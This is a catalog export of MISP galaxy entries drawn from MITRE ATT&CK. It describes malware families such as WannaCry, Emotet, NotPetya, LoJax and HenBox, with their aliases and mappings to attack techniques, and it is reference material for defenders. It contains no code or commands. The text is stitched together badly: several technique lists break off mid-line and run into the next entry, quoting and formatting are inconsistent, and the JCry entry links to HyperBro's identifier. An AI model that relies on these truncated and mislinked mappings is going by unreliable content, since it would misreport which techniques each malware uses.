[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)

The tag is: `misp-galaxy:mitre-malware="LightNeuron - S0395"`

LightNeuron - S0395 is also known as:

- LightNeuron

LightNeuron - S0395 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
Table 4828. Table References

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</table>

**WannaCry - S0366**

[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue. (Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)

The tag is: *misp-galaxy:mitre-malware="WannaCry - S0366"*
WannaCry - S0366 is also known as:

- WannaCry
- WanaCry
- WanaCrypt
- WanaCrypt0r
- WCry

WannaCry - S0366 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-
**Emotet - S0367**

[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)

The tag is: `misp-galaxy:mitre-malware="Emotet - S0367"`

**Emotet - S0367** is also known as:

- Emotet
- Geodo

**Emotet - S0367** has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with
estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"


Table 4830. Table References

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<td><a href="https://attack.mitre.org/software/S0367">https://attack.mitre.org/software/S0367</a></td>
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<td><a href="https://support.malwarebytes.com/docs/DOC-2295">https://support.malwarebytes.com/docs/DOC-2295</a></td>
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<td><a href="https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/">https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/</a></td>
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<td><a href="https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/">https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/</a></td>
</tr>
</tbody>
</table>

**HOPLIGHT - S0376**

[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT HOPLIGHT Apr 2019)

The tag is: misp-galaxy:mitre-malware="HOPLIGHT - S0376"

HOPLIGHT - S0376 is also known as:
• HOPLIGHT

HOPLIGHT - S0376 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-
NotPetya - S0368

[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: *misp-galaxy:mitre-malware="NotPetya - S0368"*

NotPetya - S0368 is also known as:

- NotPetya
- ExPetr
- Diskcoder.C
- GoldenEye
- Petrwrap
- Nyetya

NotPetya - S0368 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"*
- uses: *misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"*
- uses: *misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-
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<td><a href="https://attack.mitre.org/software/S0368">https://attack.mitre.org/software/S0368</a></td>
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<td><a href="https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html">https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html</a></td>
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</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/">https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/</a></td>
</tr>
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</table>

Ursnif - S0386

[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001), and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)

The tag is: `misp-galaxy:mitre-malware="Ursnif - S0386"`

Ursnif - S0386 is also known as:
• Ursnif
• Gozi-ISFB
• PE_URSNIF
• Dreambot

Ursnif - S0386 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
• uses: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"


• uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Data Encoding - T1132"` with estimative-language:likelihood-probability="almost-certain"


• uses: `misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"` with estimative-language:likelihood-probability="almost-certain"

• uses: `misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0386">https://attack.mitre.org/software/S0386</a></td>
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</table>

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EvilBunny - S0396

[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)

The tag is: `misp-galaxy:mitre-malware="EvilBunny - S0396"`

EvilBunny - S0396 is also known as:

- EvilBunny

EvilBunny - S0396 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 4834. Table References

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**CoinTicker - S0369**

[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)

The tag is: `misp-galaxy:mitre-malware="CoinTicker - S0369"`

CoinTicker - S0369 is also known as:

- CoinTicker

CoinTicker - S0369 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
Ebury - S0377

[ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils). (Citation: ESET Ebury Feb 2014) (Citation: BleepingComputer Ebury March 2017) (Citation: ESET Ebury Oct 2017)

The tag is: `misp-galaxy:mitre-malware="Ebury - S0377"`

Ebury - S0377 is also known as:

- Ebury

Ebury - S0377 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="DNS - T1071.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554"` with estimative-language:likelihood-probability="almost-certain"
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<td><a href="https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/">https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/</a></td>
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</tr>
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</table>

**KeyBoy - S0387**

[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)

The tag is: `misp-galaxy:mitre-malware="KeyBoy - S0387"`

KeyBoy - S0387 is also known as:

- KeyBoy

KeyBoy - S0387 has relationships with:
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 4837. Table References
LoJax - S0397

[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems. (Citation: ESET LoJax Sept 2018)

The tag is: *misp-galaxy:mitre-malware=*LoJax - S0397*

LoJax - S0397 is also known as:

- LoJax

LoJax - S0397 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern=*NTFS File Attributes - T1564.004* with estimative-language:likelihood-probability=*almost-certain*
- uses: *misp-galaxy:mitre-attack-pattern=*Modify Registry - T1112* with estimative-language:likelihood-probability=*almost-certain*
- uses: *misp-galaxy:mitre-attack-pattern=*System Firmware - T1019* with estimative-language:likelihood-probability=*almost-certain*
- uses: *misp-galaxy:mitre-attack-pattern=*Rootkit - T1014* with estimative-language:likelihood-probability=*almost-certain*
- uses: *misp-galaxy:mitre-attack-pattern=*Registry Run Keys / Startup Folder - T1547.001* with estimative-language:likelihood-probability=*almost-certain*
- uses: *misp-galaxy:mitre-attack-pattern=*System Firmware - T1542.001* with estimative-language:likelihood-probability=*almost-certain*

Table 4838. Table References

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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0397">https://attack.mitre.org/software/S0397</a></td>
</tr>
</tbody>
</table>

YAHOYAH - S0388

[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor. (Citation: TrendMicro
TropicTrooper 2015

The tag is: `misp-galaxy:mitre-malware="YAHOYAH - S0388"`

YAHOYAH - S0388 is also known as:

- YAHOYAH

YAHOYAH - S0388 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

Table 4839. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0388">https://attack.mitre.org/software/S0388</a></td>
</tr>
</tbody>
</table>

**HyperBro - S0398**

[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Unit42 Emissary Panda May 2019) (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018)

The tag is: `misp-galaxy:mitre-malware="HyperBro - S0398"`

HyperBro - S0398 is also known as:

- HyperBro

HyperBro - S0398 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002"` with estimative-
Table 4840. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0398">https://attack.mitre.org/software/S0398</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/">https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/</a></td>
</tr>
</tbody>
</table>

**JCry - S0389**

[JCry](https://attack.mitre.org/software/S0398) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign. (Citation: Carbon Black JCry May 2019)

The tag is: `misp-galaxy:mitre-malware="JCry - S0389"`

JCry - S0389 is also known as:

- JCry

JCry - S0389 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"


Table 4841. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0389">https://attack.mitre.org/software/S0389</a></td>
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</table>

**Pallas - S0399**

[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070). *(Citation: Lookout Dark Caracal Jan 2018)*

The tag is: `misp-galaxy:mitre-malware="Pallas - S0399"`

Pallas - S0399 is also known as:

- Pallas

Pallas - S0399 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-
ShimRat - S0444

[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://attack.mitre.org/software/S0444)" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)

The tag is: `misp-galaxy:mitre-malware="ShimRat - S0444"`

ShimRat - S0444 is also known as:

- ShimRat

ShimRat - S0444 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

Table 4843. Table References
**HenBox - S0544**

[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group. (Citation: Palo Alto HenBox)

The tag is: *misp-galaxy:mitre-malware="HenBox - S0544"*

HenBox - S0544 is also known as:

- HenBox

HenBox - S0544 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"


- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

